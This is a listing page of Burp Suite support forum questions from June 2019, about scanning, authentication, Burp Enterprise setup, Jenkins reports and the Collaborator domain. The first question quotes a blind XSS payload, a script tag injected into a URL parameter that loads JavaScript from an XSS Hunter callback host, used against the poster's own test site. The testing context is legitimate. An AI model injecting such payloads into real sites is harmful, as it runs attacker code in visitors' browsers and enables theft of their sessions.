How Do I?

  • Blind XSS attacks register on XssHunter Site but not when repeated in Intruder.

    Hello, I am using a blind XSS payload using XSS hunter (https://xsshunter.com). When I enter the payload manually into my test site: http://xss.in-secure.org/test.php?name=%22%3E%3Cscript%20src=https://insecureorg.xss.ht%3E%3C/script%3E It will register as received or fired on Xss Hunter's website. When I do the same attack using Burp Intruder, it does not show up on their site. ...

    1 Agent Answer    0 Community Answer
    Jun 19, 2019 08:57PM UTC
  • Scan Targets behind CAS

    Hi, I want to run the scanner on a target that is behind CAS. How do I set up authentication for this scenario? Thank you Anup

    1 Agent Answer    0 Community Answer
    Jun 19, 2019 05:58PM UTC
  • Replace expired access token in scanner request headers with the valid access token all at once

    Hi Background : I am trying to scan our website using Burp scanner. I am able to configure session handling rules (https://support.portswigger.net/customer/portal/articles/2363088-configuring-burp-s-session-handling-rules). I have used Burp's extender and python script to successfully replace expired access tokens of the current request (https://www.foregenix.com/blog/testing-problematic-a...

    1 Agent Answer    0 Community Answer
    Jun 18, 2019 11:36PM UTC
  • Burp Headless Passive Scanning

    Hi, new to Burp. I'm looking for a way to passively scan HTTP responses from a server to see if there are any vulnerabilities while burp is running headless, but not actively scan. I've found a few "headless" extensions, like https://github.com/NetsOSS/headless-burp/, but it seems that it is centered around active scanning (have to specify target scope/site and let it ru...

    2 Agent Answers    1 Community Answer
    Jun 18, 2019 09:59PM UTC
  • Interpreting path info in "strict transport security not enforced" issues

    Hi, In "target"->"site map"->"Issues" tab, I sometimes see reported issues labelled "Strict transport security not enforced" with a path set to "/", but when the request is shown, the path is actually something else. e.g. in the "issues" panel: ! Strict Transport Security not enforced [1] --! / --! /api/ --! /api/getObj...

    1 Agent Answer    1 Community Answer
    Jun 18, 2019 12:45PM UTC
  • Burp Enterprise: Failed to initialize database

    Hi, I'm trying to install Burp Enterprise on an already configured database following the documentation here: https://portswigger.net/burp/documentation/enterprise/getting-started/installation#database-setup However, after I configure the database the installation ends with the following. Initializing database ... Failed to initialize database Finishing installation ... No error...

    1 Agent Answer    1 Community Answer
    Jun 18, 2019 10:40AM UTC
  • I can't see a POST Request in Proxy Intercept menu but it is in the HTTP history menu

    I should find out a specific POST REQUEST in Proxy Intercept menu.. I couldn't find this in the menu but it was in HTTP HISTORY menu.. How can I find this in intercept menu..?

    1 Agent Answer    0 Community Answer
    Jun 17, 2019 03:38PM UTC
  • asterisk platform authentication

    hi, I need to put an entry in platform authentication (user options-connections) for some domains. When I use a.foo.com, burp still asks for another entry for b.foo.com. I want to use one entry for all *.foo.com. * doesn't seem to work (like it does in upstream proxy settings). How can I do that?

    2 Agent Answers    1 Community Answer
    Jun 17, 2019 01:48PM UTC
  • Burp collaborator server domain

    hello, I have looked at the documentation but couldn't find any reference. What is the domain name of the collaborator server that burp checks the interactions (when I click poll button)? I need to take a firewall exception from my company to let my burp installation check the interactions. https://portswigger.net/blog/introducing-burp-collaborator regards

    1 Agent Answer    1 Community Answer
    Jun 17, 2019 01:04PM UTC
  • Burp Scan plugin Post Build Actions Report

    Hello, We are using 'Burp Scan' plugin to integrate the Burp Enterprise with Jenkins. In the 'Post-build Actions' we are not able to find any options that would show the execution report that we can share with stakeholders. Could you please suggest any option for this. Thanks, Govind

    1 Agent Answer    0 Community Answer
    Jun 17, 2019 12:14PM UTC